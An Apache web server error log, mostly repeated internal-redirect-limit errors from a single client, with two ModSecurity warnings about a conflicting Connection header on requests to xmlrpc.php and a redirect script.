[Tue May 12 04:59:37.874180 2026] [security2:error] [pid 1825287:tid 1825323] [client 43.131.32.36:43956] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/xmlrpc.php"] [unique_id "agKXmQgpmE1yW0glLdgjlQAAANI"]
[Tue May 12 04:59:38.115830 2026] [core:error] [pid 1808852:tid 1808872] [client 13.75.199.23:9219] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:38.115858 2026] [core:error] [pid 1808852:tid 1808872] [client 13.75.199.23:9219] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:38.910959 2026] [core:error] [pid 1825287:tid 1825305] [client 13.75.199.23:3994] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:38.910990 2026] [core:error] [pid 1825287:tid 1825305] [client 13.75.199.23:3994] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:39.670862 2026] [core:error] [pid 1825179:tid 1825208] [client 13.75.199.23:4029] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:39.670904 2026] [core:error] [pid 1825179:tid 1825208] [client 13.75.199.23:4029] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:40.465705 2026] [core:error] [pid 1730175:tid 1730194] [client 13.75.199.23:9234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:40.465751 2026] [core:error] [pid 1730175:tid 1730194] [client 13.75.199.23:9234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:41.242078 2026] [core:error] [pid 1820198:tid 1820207] [client 13.75.199.23:10873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:41.242110 2026] [core:error] [pid 1820198:tid 1820207] [client 13.75.199.23:10873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:42.016404 2026] [core:error] [pid 1730207:tid 1730229] [client 13.75.199.23:9239] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:42.016432 2026] [core:error] [pid 1730207:tid 1730229] [client 13.75.199.23:9239] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:42.814375 2026] [core:error] [pid 1808852:tid 1808866] [client 13.75.199.23:3970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:42.814398 2026] [core:error] [pid 1808852:tid 1808866] [client 13.75.199.23:3970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:43.631804 2026] [core:error] [pid 1730175:tid 1730200] [client 13.75.199.23:9623] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:43.631846 2026] [core:error] [pid 1730175:tid 1730200] [client 13.75.199.23:9623] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:44.415940 2026] [core:error] [pid 1730207:tid 1730233] [client 13.75.199.23:8040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:44.415969 2026] [core:error] [pid 1730207:tid 1730233] [client 13.75.199.23:8040] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:45.181964 2026] [core:error] [pid 1820198:tid 1820220] [client 13.75.199.23:9241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:45.181999 2026] [core:error] [pid 1820198:tid 1820220] [client 13.75.199.23:9241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:46.018306 2026] [core:error] [pid 1730207:tid 1730212] [client 13.75.199.23:9226] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:46.018334 2026] [core:error] [pid 1730207:tid 1730212] [client 13.75.199.23:9226] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:46.810863 2026] [core:error] [pid 1730175:tid 1730177] [client 13.75.199.23:8028] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:46.810922 2026] [core:error] [pid 1730175:tid 1730177] [client 13.75.199.23:8028] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:47.567240 2026] [core:error] [pid 1808852:tid 1808879] [client 13.75.199.23:3501] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:47.567273 2026] [core:error] [pid 1808852:tid 1808879] [client 13.75.199.23:3501] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:48.323810 2026] [core:error] [pid 1825179:tid 1825210] [client 13.75.199.23:3495] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:48.323844 2026] [core:error] [pid 1825179:tid 1825210] [client 13.75.199.23:3495] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:49.114148 2026] [core:error] [pid 1820198:tid 1820209] [client 13.75.199.23:9235] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:49.114194 2026] [core:error] [pid 1820198:tid 1820209] [client 13.75.199.23:9235] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:49.935245 2026] [core:error] [pid 1730207:tid 1730209] [client 13.75.199.23:3479] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:49.935280 2026] [core:error] [pid 1730207:tid 1730209] [client 13.75.199.23:3479] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:50.699255 2026] [core:error] [pid 1730207:tid 1730232] [client 13.75.199.23:8016] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:50.699281 2026] [core:error] [pid 1730207:tid 1730232] [client 13.75.199.23:8016] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:51.456280 2026] [core:error] [pid 1808852:tid 1808869] [client 13.75.199.23:8053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:51.456307 2026] [core:error] [pid 1808852:tid 1808869] [client 13.75.199.23:8053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:52.286870 2026] [core:error] [pid 1820198:tid 1820218] [client 13.75.199.23:4043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:52.286907 2026] [core:error] [pid 1820198:tid 1820218] [client 13.75.199.23:4043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:53.164055 2026] [core:error] [pid 1825287:tid 1825307] [client 13.75.199.23:9259] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:53.164094 2026] [core:error] [pid 1825287:tid 1825307] [client 13.75.199.23:9259] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:53.957303 2026] [core:error] [pid 1820198:tid 1820200] [client 13.75.199.23:8044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:53.957343 2026] [core:error] [pid 1820198:tid 1820200] [client 13.75.199.23:8044] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:54.750001 2026] [core:error] [pid 1808852:tid 1808872] [client 13.75.199.23:3329] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:54.750033 2026] [core:error] [pid 1808852:tid 1808872] [client 13.75.199.23:3329] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:55.567296 2026] [core:error] [pid 1730175:tid 1730194] [client 13.75.199.23:9258] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:55.567332 2026] [core:error] [pid 1730175:tid 1730194] [client 13.75.199.23:9258] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:56.346722 2026] [core:error] [pid 1808852:tid 1808870] [client 13.75.199.23:8020] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:56.346761 2026] [core:error] [pid 1808852:tid 1808870] [client 13.75.199.23:8020] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:57.102951 2026] [core:error] [pid 1730175:tid 1730178] [client 13.75.199.23:9278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:57.102986 2026] [core:error] [pid 1730175:tid 1730178] [client 13.75.199.23:9278] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:57.896390 2026] [core:error] [pid 1825287:tid 1825304] [client 13.75.199.23:4064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:57.896422 2026] [core:error] [pid 1825287:tid 1825304] [client 13.75.199.23:4064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:58.716374 2026] [core:error] [pid 1730175:tid 1730179] [client 13.75.199.23:4068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:58.716410 2026] [core:error] [pid 1730175:tid 1730179] [client 13.75.199.23:4068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:59.526937 2026] [core:error] [pid 1730175:tid 1730181] [client 13.75.199.23:3437] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:59:59.526971 2026] [core:error] [pid 1730175:tid 1730181] [client 13.75.199.23:3437] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:00.306195 2026] [core:error] [pid 1820198:tid 1820214] [client 13.75.199.23:3452] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:00.306223 2026] [core:error] [pid 1820198:tid 1820214] [client 13.75.199.23:3452] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:01.101515 2026] [core:error] [pid 1825287:tid 1825317] [client 13.75.199.23:3415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:01.101543 2026] [core:error] [pid 1825287:tid 1825317] [client 13.75.199.23:3415] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:01.878066 2026] [core:error] [pid 1820198:tid 1820203] [client 13.75.199.23:8850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:01.878099 2026] [core:error] [pid 1820198:tid 1820203] [client 13.75.199.23:8850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:02.653253 2026] [core:error] [pid 1730175:tid 1730199] [client 13.75.199.23:4090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:02.653285 2026] [core:error] [pid 1730175:tid 1730199] [client 13.75.199.23:4090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:03.466401 2026] [core:error] [pid 1730175:tid 1730189] [client 13.75.199.23:8836] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:03.466426 2026] [core:error] [pid 1730175:tid 1730189] [client 13.75.199.23:8836] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:04.247869 2026] [core:error] [pid 1808852:tid 1808860] [client 13.75.199.23:8374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:04.247915 2026] [core:error] [pid 1808852:tid 1808860] [client 13.75.199.23:8374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:05.077974 2026] [core:error] [pid 1820198:tid 1820221] [client 13.75.199.23:8355] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:05.078013 2026] [core:error] [pid 1820198:tid 1820221] [client 13.75.199.23:8355] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:05.896525 2026] [core:error] [pid 1730207:tid 1730233] [client 13.75.199.23:8853] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:05.896548 2026] [core:error] [pid 1730207:tid 1730233] [client 13.75.199.23:8853] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:06.717751 2026] [core:error] [pid 1825287:tid 1825315] [client 13.75.199.23:8863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:06.717785 2026] [core:error] [pid 1825287:tid 1825315] [client 13.75.199.23:8863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:07.509342 2026] [core:error] [pid 1808852:tid 1808877] [client 13.75.199.23:8380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:07.509373 2026] [core:error] [pid 1808852:tid 1808877] [client 13.75.199.23:8380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:08.302749 2026] [core:error] [pid 1820198:tid 1820219] [client 13.75.199.23:3392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:08.302776 2026] [core:error] [pid 1820198:tid 1820219] [client 13.75.199.23:3392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:09.061415 2026] [core:error] [pid 1825179:tid 1825220] [client 13.75.199.23:8363] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:09.061458 2026] [core:error] [pid 1825179:tid 1825220] [client 13.75.199.23:8363] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:09.818738 2026] [core:error] [pid 1825287:tid 1825311] [client 13.75.199.23:8377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:09.818767 2026] [core:error] [pid 1825287:tid 1825311] [client 13.75.199.23:8377] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:10.612916 2026] [core:error] [pid 1808852:tid 1808871] [client 13.75.199.23:8344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:10.612945 2026] [core:error] [pid 1808852:tid 1808871] [client 13.75.199.23:8344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:11.423217 2026] [core:error] [pid 1820198:tid 1820209] [client 13.75.199.23:8837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:11.423244 2026] [core:error] [pid 1820198:tid 1820209] [client 13.75.199.23:8837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:12.263477 2026] [core:error] [pid 1808852:tid 1808869] [client 13.75.199.23:9682] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:12.263501 2026] [core:error] [pid 1808852:tid 1808869] [client 13.75.199.23:9682] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:13.935226 2026] [core:error] [pid 1825179:tid 1825214] [client 13.75.199.23:9671] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:13.935272 2026] [core:error] [pid 1825179:tid 1825214] [client 13.75.199.23:9671] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:14.727984 2026] [core:error] [pid 1820198:tid 1820203] [client 13.75.199.23:9665] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:14.728010 2026] [core:error] [pid 1820198:tid 1820203] [client 13.75.199.23:9665] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:15.566344 2026] [core:error] [pid 1808852:tid 1808860] [client 13.75.199.23:8674] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:15.566386 2026] [core:error] [pid 1808852:tid 1808860] [client 13.75.199.23:8674] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:16.380854 2026] [core:error] [pid 1825287:tid 1825320] [client 13.75.199.23:8664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:16.380910 2026] [core:error] [pid 1825287:tid 1825320] [client 13.75.199.23:8664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:17.205610 2026] [core:error] [pid 1820198:tid 1820206] [client 13.75.199.23:9480] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:17.205641 2026] [core:error] [pid 1820198:tid 1820206] [client 13.75.199.23:9480] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:17.984980 2026] [core:error] [pid 1730175:tid 1730195] [client 13.75.199.23:8682] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:17.985010 2026] [core:error] [pid 1730175:tid 1730195] [client 13.75.199.23:8682] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:18.745676 2026] [core:error] [pid 1825287:tid 1825329] [client 13.75.199.23:10203] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:18.745704 2026] [core:error] [pid 1825287:tid 1825329] [client 13.75.199.23:10203] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:19.507313 2026] [core:error] [pid 1808852:tid 1808874] [client 13.75.199.23:10231] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:19.507350 2026] [core:error] [pid 1808852:tid 1808874] [client 13.75.199.23:10231] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 05:00:32.298708 2026] [security2:error] [pid 1825179:tid 1825197] [client 43.152.72.244:60604] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKX0Nr1yOh9TvizeziVyQAAAEA"]
